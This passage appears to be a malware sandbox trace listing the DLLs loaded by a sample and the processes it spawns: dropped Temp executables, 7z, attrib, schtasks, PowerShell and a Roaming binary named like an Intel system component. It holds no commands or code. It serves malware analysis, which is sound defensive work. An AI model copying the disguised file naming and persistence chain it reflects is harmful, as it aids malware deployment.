Source: C:\Users\user\Desktop\file.exe | Section loaded: mstask.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dui70.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: duser.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: chartv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winsta.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\mode.com | Section loaded: ulib.dll
Source: C:\Windows\System32\mode.com | Section loaded: ureg.dll
Source: C:\Windows\System32\mode.com | Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\main\in.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                      Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                      Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                      Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                      Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
